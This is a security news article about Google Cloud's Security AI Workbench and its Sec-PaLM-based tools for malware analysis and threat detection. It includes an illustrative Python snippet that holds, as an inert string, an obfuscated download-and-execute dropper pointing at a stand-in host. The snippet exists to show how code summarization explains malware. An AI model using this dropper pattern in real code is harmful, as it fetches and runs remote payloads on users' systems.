Google Cloud Introduces Security AI Workbench for Faster Threat Detection and Analysis
April 25, 2023 | Security | The Hacker News
Google's cloud division is following in the footsteps of Microsoft with the launch of Security AI Workbench, which leverages generative AI models to gain better visibility into the threat landscape.
Powering the cybersecurity suite is Sec-PaLM, a specialized large language model (LLM) that's "fine-tuned for security use cases."
The idea is to take advantage of the latest advances in AI to augment point-in-time incident analysis, threat detection, and analytics, countering and preventing new infections by delivering intelligence that's trusted, relevant, and actionable.
To that end, the Security AI Workbench spans a wide range of new AI-powered tools, including VirusTotal Code Insight and Mandiant Breach Analytics for Chronicle, to analyze potentially malicious scripts and alert customers to active breaches in their environments.
As with Microsoft's GPT-4-based Security Copilot, users can "conversationally search, analyze, and investigate security data" with the aim of reducing mean time-to-respond and quickly determining the full scope of events.
Threat Detection and Analysis
The Code Insight feature in VirusTotal, for its part, generates natural language summaries of code snippets to help detect and mitigate potential threats. It can also be used to flag false negatives and clear false positives.
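For a sense of what such a summary looks like, here is a minimal sketch: a short, lightly obfuscated download-and-execute snippet of the kind an analyst might submit, paired with the style of plain-English explanation a code-summarization model could return. Both the sample script and the summary wording are illustrative assumptions, not actual Code Insight output.

```python
# Illustrative only: a suspicious snippet (inert, stored as a string) and the
# kind of natural-language summary a code-analysis LLM might produce for it.

suspicious_script = r"""
import base64, urllib.request, subprocess
u = base64.b64decode("aHR0cDovL2V4YW1wbGUuY29tL3BheWxvYWQuc2g=").decode()
p = "/tmp/.cache_helper"
urllib.request.urlretrieve(u, p)
subprocess.Popen(["bash", p])
"""

# Hypothetical summary text, not output from VirusTotal Code Insight:
example_summary = (
    "The script decodes a Base64-encoded URL, downloads a file from it to a "
    "hidden path under /tmp, and executes it with bash. This obfuscated "
    "download-and-execute pattern is characteristic of a malware dropper."
)

print(example_summary)
```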
Another key offering is Security Command Center AI, which utilizes Sec-PaLM to provide operators with "near-instant analysis of findings and possible attack paths" as well as impacted assets and recommended mitigations.
Google is also using machine learning models to detect and respond to API abuse and business logic attacks, in which an adversary weaponizes legitimate functionality to achieve a nefarious goal without triggering a security alert.
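As a rough illustration of why such attacks are hard to catch with signatures alone, the sketch below scores API clients on behavioral signals (request volume and failure ratio against a single endpoint), since every individual request in a business logic attack is well-formed. The log fields, thresholds, and endpoint name are assumptions made for the example; Google has not published details of its models.

```python
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class ApiCall:
    client_id: str   # API key or account that made the call
    endpoint: str    # e.g. "/v1/coupons/redeem" (hypothetical endpoint)
    status: int      # HTTP status code returned

def flag_business_logic_abuse(calls: list[ApiCall],
                              min_calls: int = 500,
                              max_failure_ratio: float = 0.9) -> set[str]:
    """Flag clients hammering one legitimate endpoint with mostly failing calls.

    Each request is valid on its own, so input validation and signature rules
    see nothing wrong; the signal is behavioral (volume plus failure ratio),
    the kind of pattern an ML model can learn far more robustly than these
    hard-coded thresholds.
    """
    stats = defaultdict(lambda: [0, 0])  # (client, endpoint) -> [total, failures]
    for call in calls:
        key = (call.client_id, call.endpoint)
        stats[key][0] += 1
        if call.status >= 400:
            stats[key][1] += 1

    flagged = set()
    for (client, _endpoint), (total, failures) in stats.items():
        if total >= min_calls and failures / total >= max_failure_ratio:
            flagged.add(client)
    return flagged
```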
"Because Security AI Workbench is built on Google Cloud's Vertex AI infrastructure, customers control their data with enterprise-grade capabilities such as data isolation, data protection, sovereignty, and compliance support," Google Cloud's Sunil Potti said.
The development comes days after Google announced the creation of a new unit called Google DeepMind that brings together its AI research groups from DeepMind and the Brain team from Google Research to "build more capable systems more safely and responsibly."
News of Google's Security AI Workbench also follows GitLab's plans to integrate AI into its platform to help prevent developers from leaking access tokens and to cut down on false positives during security testing.